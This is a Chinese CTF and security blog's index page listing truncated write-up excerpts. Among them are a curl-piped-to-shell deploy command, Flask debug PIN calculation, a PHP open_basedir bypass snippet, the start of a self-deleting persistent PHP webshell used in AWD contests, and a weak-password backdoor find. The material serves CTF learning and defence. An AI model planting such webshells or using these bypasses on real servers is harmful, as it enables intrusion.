Dr0n's blog
  • 首页
  • 时间轴
  • 分类
  • 标签
  • 关于
  • 友链
  • awd
  • tools
    CyberChef emoji-aes

第二届vecctf-wp

misczip-guessing打开压缩包发现提示password=.......py 进行6位密码爆破,得到密码3a1b6c 解压得到flag flag{fa8d910600a5467d9d2f433f2bba4c80} Spiderman修改高度,发现字符串README:HAHAyoufoundIT binwalk分离出一个带密码的压缩包 压缩包中含有一个名为README.txt的文件将H
2022-05-21
wp
#wp #2022竞赛 #vec

ctf平台搭建与出题指南

ctf平台搭建目前最常见的平台是CTFd和GZCTF CTFd使用帆哥的一键部署脚本(centos7和ubuntu20上测试成功)sh <(curl -s https://raw.githubusercontent.com/pwnthebox/ctfd-auto-deploy/master/install.sh) 2024.5.13帆哥github被封了,重构/优化了一下自动部署
2022-05-05
项目
#docker #平台搭建部署 #自动化 #自研工具

flask算pin

flask在开启debug模式后会启动调试模式,一般为/console,需要正确的PIN码才能进入 python3.8和python3.6生成PIN的算法不同 算法代码在site-packages/werkzeug/debug/__init__.py 需要的信息 代码中 文件中 username getpass.getuser() /etc/passwd mod
2022-03-25
python
#flask #python

php绕过open_basedir

open_basedir一般用来限制跨目录读写文件 php绕过open_basedir是一个古老的漏洞,在2009年左右就被提出来了 glob://opendir()函数为打开目录句柄,readdir()函数为从目录句柄中读取条目。 这里结合两个函数来列举根目录中的文件: 1234567$a="glob:///*";if ( $b = opendir($a)
2022-03-25
php
#php #总结 #open_basedir #bypass

HSC1th 2022-wp

miscSign-inflag{HSC_W3LC0M3} DORAEMON 哆啦A梦把泡好的QR放进口袋后,用六位数字把自己放好了。你能找到它吗? 压缩包先暴力破解出密码为376852 得到一张图片,发现高度不对劲,增加一点高度,看到破损的二维码把定位符补上,扫码得到flag 汝闻,人言否看到压缩包的50 4B 01 02,但是没找到头,搜了一下发现头被改成了4B 50结尾
2022-02-20
wp
#wp #2022竞赛 #HSC

pwnthebox-内网渗透(入门)

使用到的工具kaliburpfirefoxreGeorgproxychainsnmap冰蝎蚁剑 题目描述根据描述得知有两层,因为是demo题目,所以给出了漏洞,降低了难度,实际上的题目漏洞点是不知道的,需要自己发掘 解题第一层apache解析漏洞上传1.php.jpg即可getshell 有了第一台主机的shell后首先要做的就是信息收集了 信息收集首先看ip,网段等信息。。。上来啥命令用不了
2022-01-14
内网渗透
#基础知识 #内网渗透

AWD不死马与克制方法

不死马一个典型的不死马: 12345678910111213<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.l.php'; $code = '<?php if(md5($_GET["pass"])==
2022-01-03
awd
#总结 #awd #不死马

【ctfshow】摆烂杯-wp

摆烂了,没有wp
2021-12-26
wp
#wp #ctfshow

2021台州市首届网络安全大赛

喜提榜一 Webweb1flag在请求头中 web2扫描目录得到后台路径/admin 用admin,admin888弱口令进入后台 在网站安全一栏中使用检测木马功能,发现后门 使用文件管理功能查看木马文件,发现被混淆了 1234567891011<?php$mt = "mFsKCleRfU";$ojj = "IEBleldle";$hsa = &q
2021-12-17
wp
#wp #台州 #2021竞赛

2021NUAA-wp

时间有点紧,有几题差一点 签到腾讯会议flag{we1c0m_t0_asur!ctf} miscbaby_mix伪加密,09改成00图片上边左边看到白条,应该是lsbstegsolve查看得到二维码扫码得到 14a5a4a584732544748424658515654514f4634575135435447564a4749564a5347463455595754564f464c444f57525
2021-12-11
wp
#wp #2021竞赛 #nuaa
1…56789…11

搜索

Hexo Fluid
载入天数... 载入时分秒...
总访问量 次 总访客数 人
浙ICP备2022002247号 | police-icon 浙公网安备33021202003790号